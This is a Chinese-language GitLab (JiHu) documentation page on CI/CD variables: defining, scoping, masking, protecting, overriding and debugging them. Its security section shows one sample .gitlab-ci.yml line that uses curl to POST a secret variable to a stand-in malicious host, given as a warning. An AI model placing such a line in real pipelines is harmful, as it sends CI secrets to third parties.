极狐GitLab CI/CD 变量

CI/CD 变量是一种环境变量。 您可以将它们用于:

  • 控制作业和流水线
  • 存储要重复使用的值。
  • 避免在您的 .gitlab-ci.yml 文件中硬编码值。

您可以使用预定义 CI/CD 变量或自定义:

您可以为特定流水线手动覆盖变量值,或让它们在手动流水线中预填入

变量名称受限于 runner 使用的 shell 来执行脚本。每个 shell 都有自己的一组保留变量名。

确保每个变量都是为您要使用它的范围定义的。

预定义 CI/CD 变量

极狐GitLab CI/CD 使一组预定义的 CI/CD 变量可用于流水线配置和作业脚本。您可以在 .gitlab-ci.yml 中使用预定义的 CI/CD 变量,而无需先声明它们。

例如:

job1:
  stage: test
  script:
    - echo "$CI_JOB_STAGE"

此示例中的脚本输出 job1 作业的阶段,即 test

.gitlab-ci.yml 文件中定义 CI/CD 变量

要在 .gitlab-ci.yml 文件中创建自定义变量,请使用 variables 关键字定义变量和值。

您可以在作业中或在 .gitlab-ci.yml 文件的顶层使用 variables 关键字。 如果变量在顶层,则它是全局可用的,所有作业都可以使用它。 如果它在作业中定义,则只有该作业可以使用它。

variables:
  TEST_VAR: "All jobs can use this variable's value"

job1:
  variables:
    TEST_VAR_JOB: "Only job1 can use this variable's value"
  script:
    - echo "$TEST_VAR" and "$TEST_VAR_JOB"

保存在 .gitlab-ci.yml 文件中的变量应该只存储非敏感的项目配置,比如 RAILS_ENVDATABASE_URL 变量。这些变量在仓库中可见。 在项目设置中存储包含例如 secret、密钥等值的敏感变量。

.gitlab-ci.yml 文件中保存的变量也可以在 service 容器中使用。

如果您不想在作业中使用全局定义的变量,请将 variables 设置为 {}

job1:
  variables: {}
  script:
    - echo This job does not need any variables

使用 valuedescription 关键字来定义用于手动触发的流水线预填充的变量

在 UI 中定义 CI/CD 变量

您可以在 UI 中定义 CI/CD 变量:

默认情况下,派生项目中的流水线无法访问父项目中的 CI/CD 变量。 如果您在父项目中为来自派生项目的合并请求运行合并请求流水线,所有变量都可用于流水线。

极狐GitLab UI 中设置的变量传递给服务容器。 要设置它们,请将它们分配给 UI 中的变量,然后在您的 .gitlab-ci.yml 中重新分配它们:

variables:
  SA_PASSWORD: $SA_PASSWORD

对于一个项目

引入于 15.7 版本,项目最多可以定义 200 个 CI/CD 变量。

您可以将 CI/CD 变量添加到项目的设置中。只有具有维护者角色的项目成员才能添加或更新项目 CI/CD 变量。要将 CI/CD 变量保密,请将其放在项目设置中,而不是放在 .gitlab-ci.yml 文件中。

要在项目设置中添加或更新变量:

  1. 转到您项目的 设置 > CI/CD 并展开 变量 部分。
  2. 选择 添加变量 并填写详细信息:

    • :必须是一行,不能有空格,只能使用字母、数字或_
    • :没有限制。
    • 类型Variable(默认)或 File
    • 环境范围:可选。All,或特定环境。
    • 保护变量:可选。如果选中,该变量仅在受保护分支或标签上运行的流水线中可用。
    • 隐藏变量:可选。如果选中,变量的 将在作业日志中被隐藏。如果值不满足隐藏要求,则变量保存失败。

创建变量后,您可以在 .gitlab-ci.yml 配置作业脚本中使用。

对于群组

  • 对环境范围的支持引入于专业版 13.11 版本。
  • 引入于 15.7 版本,群组最多可以定义 200 个 CI/CD 变量。

要使 CI/CD 变量可用于群组中的所有项目,请定义群组 CI/CD 变量。您必须是群组所有者。

使用群组变量来存储密码、SSH 密钥和凭据等 secret,如果您:

添加群组变量:

  1. 在群组中,前往 设置 > CI/CD
  2. 选择 添加变量 并填写详细信息:

    • :必须是一行,不能有空格,只能使用字母、数字或_
    • :没有限制。
    • 类型Variable(默认)或 File
    • 环境范围:可选。All,或特定环境。
    • 保护变量:可选。如果选中,该变量仅在受保护分支或标签上运行的流水线中可用。
    • 隐藏变量:可选。如果选中,变量的 将在作业日志中被隐藏。如果值不满足隐藏要求,则变量保存失败。

项目中可用的群组变量列在项目的 设置 > CI/CD > 变量 部分。来自子组的变量被递归继承。

对于实例

  • 引入于 13.0 版本。
  • 功能标志移除于 13.11 版本。

要使 CI/CD 变量可用于实例中的所有项目和群组,请添加实例 CI/CD 变量。您必须具有管理员角色。

添加实例变量:

  1. 在顶部栏上,选择 菜单 > 管理
  2. 在左侧边栏上,选择 设置 > CI/CD 并展开 变量 部分。
  3. 选择 添加变量 并填写详细信息:

    • :必须是一行,不能有空格,只能使用字母、数字或_
    • :在 13.3 及更高版本中,允许 10,000 个字符。这也受所选 runner 操作系统的限制。在 13.0 到 13.2 中,允许 700 个字符。
    • 类型Variable(默认)或 File
    • 保护变量:可选。如果选中,该变量仅在受保护分支或标签上运行的流水线中可用。
    • 隐藏变量:可选。如果选中,变量的 不会显示在作业日志中。如果值不满足隐藏要求,则不保存该变量。

项目中可用的实例变量列在项目的 设置 > CI/CD > 变量 部分。

CI/CD 变量安全

推送到您的 .gitlab-ci.yml 文件的恶意代码可能会危及您的变量并将它们发送到第三方服务器,而不管隐藏设置如何。如果流水线在受保护分支受保护标签上运行,恶意代码可能会损害受保护的变量。

在您执行以下操作之前,查看所有对 .gitlab-ci.yml 文件引入更改的合并请求:

  • 在父项目中,为从派生项目提交的合并请求运行流水线
  • 合并更改

在添加文件或针对它们运行流水线之前,请查看导入项目的 .gitlab-ci.yml 文件。

以下示例显示了 .gitlab-ci.yml 文件中的恶意代码:

build:
  script:
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"

变量值使用 aes-256-cbc 加密并存储在数据库中。此数据只能使用有效的 secret 文件读取和解密。

隐藏 CI/CD 变量

您可以屏蔽项目、群组或实例 CI/CD 变量,以便该变量的值不会显示在作业日志中。

隐藏变量:

  1. 在项目、群组或管理中心,转到 设置 > CI/CD
  2. 展开 变量 部分。
  3. 在要保护的变量旁边,选择 编辑
  4. 选中 隐藏变量 复选框。
  5. 选择 更新变量

用于隐藏变量的方法限制了可以包含在隐藏变量中的内容。 变量的值必须:

  • 是单行。
  • 8 个字符或更长,仅包含:
    • Base64 字母表 (RFC4648) 中的字符。
    • @: 字符。
    • . 字符。
    • ~ 字符。
  • 与现有预定义或自定义 CI/CD 变量的名称不匹配。
caution隐藏 CI/CD 变量并不能保证防止恶意用户访问变量值。隐藏功能是“尽力而为”的,可以在意外泄露变量时提供帮助。为了使变量更安全,可以考虑使用外部 secrets文件类型变量来防止 env/printenv 等命令打印 secret 变量。

Runner 版本以不同的方式实现隐藏,其中一些具有技术限制。下表列出了此类限制。

开始版本 结束版本 限制
v11.9.0 v14.1.0 大型 secrets(大于 4 KiB)的隐藏可能会被泄露。没有敏感的 URL 参数隐藏。
v14.2.0 v15.3.0 大型 secrets(大于 4 KiB)的 tails 可能会被泄露。没有敏感的 URL 参数隐藏。
v15.7.0   启用 CI_DEBUG_SERVICES 时可能会泄露 secrets。有关详细信息,请阅读服务容器日志记录

保护 CI/CD 变量

您可以将项目、群组或实例 CI/CD 变量配置为仅可用于受保护分支受保护标签

合并结果流水线在临时合并提交上运行,而不是分支或标签,无法访问这些变量。

如果源分支是受保护的分支,则直接在合并请求的源分支上运行,且没有添加合并提交的流水线可以访问这些变量。

要将变量标记为受保护:

  1. 进入项目、群组或实例管理中心的 设置 > CI/CD
  2. 展开 变量 部分。
  3. 在要保护的变量旁边,选择 编辑
  4. 选中 保护变量 复选框。
  5. 选择 更新变量

该变量可用于所有后续流水线。

使用文件类型 CI/CD 变量

所有预定义的 CI/CD 变量和 .gitlab-ci.yml 文件中定义的变量都是 Variable 类型。项目、群组和实例 CI/CD 变量可以是 VariableFile 类型。

Variable 类型变量:

  • 由键值对组成。
  • 在作业中作为环境变量提供,具有:
    • CI/CD 变量键作为环境变量名称。
    • CI/CD 变量值作为环境变量值。

对于需要文件作为输入的工具,使用 File 类型的 CI/CD 变量。

File 类型变量:

  • 由键、值和文件组成。
  • 在作业中作为环境变量提供,具有:
    • CI/CD 变量键作为环境变量名称。
    • 保存到临时文件的 CI/CD 变量值。
    • 作为环境变量值的临时文件的路径。

一些工具,如 AWS CLIkubectl 使用 File 类型变量进行配置。

例如,如果您有以下变量:

  • 类型为 Variable的变量:KUBE_URL,值为 https://example.com
  • 类型为 File 的变量:KUBE_CA_PEM 以证书作为值。

在作业脚本中使用变量,如下所示:

kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
caution将文件变量的值分配给另一个变量时要小心。另一个变量将文件的内容作为其值,不是文件的路径。

File 类型变量的替代方法是:

  • 读取 CI/CD 变量的值(variable 类型)。
  • 将值保存在文件中。
  • 在脚本中使用该文件。
# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file
echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem"
# Pass the newly created file to kubectl
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem"

在作业脚本中使用 CI/CD 变量

所有 CI/CD 变量都设置为作业环境中的环境变量。 您可以在作业脚本中使用每个环境 shell 的标准格式的变量。

要访问环境变量,请使用 runner executor’s shell 的语法。

使用 Bash、sh 和类似的变量

要访问 Bash、sh 和类似 shell 中的环境变量,请在 CI/CD 变量前加上 ($):

job_name:
  script:
    - echo "$CI_JOB_ID"

在 PowerShell 中使用变量

要访问 Windows PowerShell 环境中的变量,包括系统设置的环境变量,请在变量名前加上 ($env:) 或 ($):

job_name:
  script:
    - echo $env:CI_JOB_ID
    - echo $CI_JOB_ID
    - echo $env:PATH

在某些情况下,环境变量必须用引号括起来才能正确扩展:

job_name:
  script:
    - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test

在 Windows Batch 中使用变量

要在 Windows Batch 中访问 CI/CD 变量,请用 % 将变量括起来:

job_name:
  script:
    - echo %CI_JOB_ID%

您还可以用 ! 将变量括起来以表示延迟扩展。 包含空格或换行符的变量可能需要延迟扩展。

job_name:
  script:
    - echo !ERROR_MESSAGE!

将环境变量传递给另一个作业

您可以在稍后阶段将环境变量从一个作业传递到另一个作业。 这些变量不能用作 CI/CD 变量来配置流水线,但可以在作业脚本中使用。

  1. 在作业脚本中,将变量保存为 .env 文件。
  2. .env 文件保存为 artifacts:reports:dotenv 产物。
  3. 使用 dependenciesneeds 关键字。
  4. 后面的作业可以使用脚本中的变量

例如,使用 dependencies 关键字:

build:
  stage: build
  script:
    - echo "BUILD_VERSION=hello" >> build.env
  artifacts:
    reports:
      dotenv: build.env

deploy:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is: 'hello'
  dependencies:
    - build
  environment: production

例如,使用 needs:artifacts 关键字:

build:
  stage: build
  script:
    - echo "BUILD_VERSION=hello" >> build.env
  artifacts:
    reports:
      dotenv: build.env

deploy_one:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is: 'hello'
  dependencies:
    - build
  environment:
    name: customer1
    deployment_tier: production

deploy_two:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is empty
  dependencies: []
  environment:
    name: customer2
    deployment_tier: production

deploy_three:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is: 'hello'
  needs:
    - build
  environment:
    name: customer3
    deployment_tier: production

deploy_four:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is: 'hello'
  needs:
    job: build
    artifacts: true
  environment:
    name: customer4
    deployment_tier: production

deploy_five:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is empty
  needs:
    job: build
    artifacts: false
  environment:
    name: customer5
    deployment_tier: production

在一个变量中存储多个值

无法创建作为值数组的 CI/CD 变量,但您可以使用 shell 脚本技术实现类似的行为。

例如,您可以在一个变量中存储由空格分隔的多个变量,然后使用脚本循环遍历这些值:

job1:
  variables:
    FOLDERS: src test docs
  script:
    - |
      for FOLDER in $FOLDERS
        do
          echo "The path is root/${FOLDER}"
        done

在其他变量中使用变量

您可以在其他变量中使用变量:

job:
  variables:
    FLAGS: '-al'
    LS_CMD: 'ls "$FLAGS"'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al'

在变量中使用 $ 字符

如果您不想将 $ 字符解释为变量的开头,请改用 $$

job:
  variables:
    FLAGS: '-al'
    LS_CMD: 'ls "$FLAGS" $$TMP_DIR'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al $TMP_DIR'

阻止 CI/CD 变量展开

引入于 15.7 版本。

扩展变量将带有 $ 字符的值视为对另一个变量的引用。CI/CD 变量默认展开。

要将带有 $ 字符的变量视为原始字符串,请禁用变量的变量展开:

  1. 在项目或组中,转到 设置 > CI/CD
  2. 展开 变量 部分。
  3. 在您不想展开的变量旁边,选择 编辑
  4. 清除 展开变量 复选框。
  5. 选择 更新变量

CI/CD 变量优先级

您可以在不同的地方使用具有相同名称的 CI/CD 变量,但这些值可以相互覆盖。变量的类型及其定义位置决定了哪些变量优先。

变量的优先顺序是(从高到低):

  1. 以下都具有相同(最高)的优先级:
    • 触发器变量
    • 计划流水线变量
    • 手动流水线运行变量
    • 使用 API 创建流水线时添加的变量
  2. 项目变量。
  3. 群组变量,如果群组及其子组中存在相同的变量名称,则作业使用最近子组中的值。 例如,如果您有 Group > Subgroup 1 > Subgroup 2 > Project,则在 Subgroup 2 中定义的变量优先。
  4. 实例变量。
  5. 继承的变量。
  6. .gitlab-ci.yml 文件中的作业中定义的变量。
  7. .gitlab-ci.yml 文件中在作业(全局)之外定义的变量。
  8. 部署变量。
  9. 预定义变量。

在下面的例子中,当 job1 中的脚本执行时,API_TOKEN 的值为 secure。 作业中定义的变量比全局定义的变量具有更高的优先级。

variables:
  API_TOKEN: "default"

job1:
  variables:
    API_TOKEN: "secure"
  script:
    - echo "The variable value is $API_TOKEN"

覆盖定义的 CI/CD 变量

您可以在以下情况下覆盖变量的值:

  1. 在 UI 中手动运行流水线
  2. 使用 API 创建流水线。
  3. 在 UI 中手动运行作业。
  4. 使用推送选项
  5. 使用 API 触发流水线。
  6. 通过使用 variable 关键字或通过使用变量继承,将变量传递到下游流水线。

在这些事件中声明的流水线变量优先于其他变量

note您应该避免覆盖预定义变量,因为它可能导致流水线出现意外行为。

手动运行流水线时覆盖变量

当您手动运行流水线时,您可以覆盖 CI/CD 变量的值。

  1. 转到您项目的 CI/CD > 流水线 并选择 运行流水线
  2. 选择要为其运行流水线的分支。
  3. 在 UI 中输入变量及其值。

限制谁可以覆盖变量

引入于 13.8 版本。

您只能向维护者授予覆盖变量的权限。当其他用户尝试运行带有覆盖变量的流水线时,他们会收到 Insufficient permissions to set pipeline variables 错误消息。

如果您将 CI/CD 配置存储在不同的仓库中,请使用此设置来控制流水线运行所在的环境。

您可以使用 API 启用 restrict_user_defined_variables 设置,来启用此功能。该设置默认为 disabled

故障排除

列出所有环境变量

您可以使用 Bash 中的 export 命令或 PowerShell 中的 dir env: 列出脚本可用的所有环境变量。这暴露了所有可用变量的值,可能是一个安全风险隐藏变量显示为 [masked]

例如:

job_name:
  script:
    - export
    # - 'dir env:'  # Use this for PowerShell

作业日志输出示例:

export CI_JOB_ID="50"
export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a"
export CI_COMMIT_SHORT_SHA="1ecfd275"
export CI_COMMIT_REF_NAME="main"
export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git"
export CI_COMMIT_TAG="1.0.0"
export CI_JOB_NAME="spec:other"
export CI_JOB_STAGE="test"
export CI_JOB_MANUAL="true"
export CI_JOB_TRIGGERED="true"
export CI_JOB_TOKEN="[masked]"
export CI_PIPELINE_ID="1000"
export CI_PIPELINE_IID="10"
export CI_PAGES_DOMAIN="gitlab.io"
export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss"
export CI_PROJECT_ID="34"
export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss"
export CI_PROJECT_NAME="gitlab-foss"
export CI_PROJECT_TITLE="GitLab FOSS"
...

启用 Debug 日志

cautionDebug 日志记录可能是一个严重的安全风险。输出包含作业可用的所有变量和其他 secret 的内容。输出上传到 GitLab 服务器并在作业日志中可见。

您可以使用 Debug 日志来帮助解决流水线配置或作业脚本的问题。Debug 日志公开了通常被 runner 隐藏的作业执行细节,并使作业日志更加详细。它还公开了作业可用的所有变量和 secret。

在启用 Debug 日志记录之前,请确保只有团队成员可以查看作业日志。在再次公开日志之前,您还应该删除作业日志和 Debug 输出。

要启用 Debug 日志记录(跟踪),请将 CI_DEBUG_TRACE 变量设置为 true

job_name:
  variables:
    CI_DEBUG_TRACE: "true"

示例输出(截取):

...
export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE"
if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then
  echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\''
  $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace"
  $'\''git'\'' "config" "fetch.recurseSubmodules" "false"
  $'\''rm'\'' "-f" ".git/index.lock"
  $'\''git'\'' "clean" "-ffdx"
  $'\''git'\'' "reset" "--hard"
  $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git"
  $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds"
++ CI_BUILDS_DIR=/builds
++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ export CI_CONCURRENT_ID=87
++ CI_CONCURRENT_ID=87
++ export CI_CONCURRENT_PROJECT_ID=0
++ CI_CONCURRENT_PROJECT_ID=0
++ export CI_SERVER=yes
++ CI_SERVER=yes
++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp
++ echo -n '-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----'
++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ export CI_PIPELINE_ID=52666
++ CI_PIPELINE_ID=52666
++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ export CI_JOB_ID=7046507
++ CI_JOB_ID=7046507
++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ export CI_JOB_TOKEN=[MASKED]
++ CI_JOB_TOKEN=[MASKED]
++ export CI_REGISTRY_USER=gitlab-ci-token
++ CI_REGISTRY_USER=gitlab-ci-token
++ export CI_REGISTRY_PASSWORD=[MASKED]
++ CI_REGISTRY_PASSWORD=[MASKED]
++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ export CI_JOB_NAME=debug_trace
++ CI_JOB_NAME=debug_trace
++ export CI_JOB_STAGE=test
++ CI_JOB_STAGE=test
++ export CI_NODE_TOTAL=1
++ CI_NODE_TOTAL=1
++ export CI=true
++ CI=true
++ export GITLAB_CI=true
++ GITLAB_CI=true
++ export CI_SERVER_URL=https://gitlab.com:3000
++ CI_SERVER_URL=https://gitlab.com:3000
++ export CI_SERVER_HOST=gitlab.com
++ CI_SERVER_HOST=gitlab.com
++ export CI_SERVER_PORT=3000
++ CI_SERVER_PORT=3000
++ export CI_SERVER_PROTOCOL=https
++ CI_SERVER_PROTOCOL=https
++ export CI_SERVER_NAME=GitLab
++ CI_SERVER_NAME=GitLab
++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ export CI_PROJECT_ID=17893
++ CI_PROJECT_ID=17893
++ export CI_PROJECT_NAME=ci-debug-trace
++ CI_PROJECT_NAME=ci-debug-trace
...

限制对 debug 日志的访问

  • 引入于 13.7 版本。
  • 功能标志移除于 13.8 版本。

您可以限制对 debug 日志的访问。当受到限制时,只有具有开发人员或更高权限的用户才能在使用以下变量,启用 debug 日志记录时查看作业日志:

  • .gitlab-ci.yml 文件。
  • GitLab UI 中设置的 CI/CD 变量。
caution如果您将 CI_DEBUG_TRACE 作为局部变量添加到 runner,debug 日志会生成,并对所有有权访问作业日志的用户可见。Runner 不会检查权限级别,因此您应该只在 GitLab 本身中使用该变量。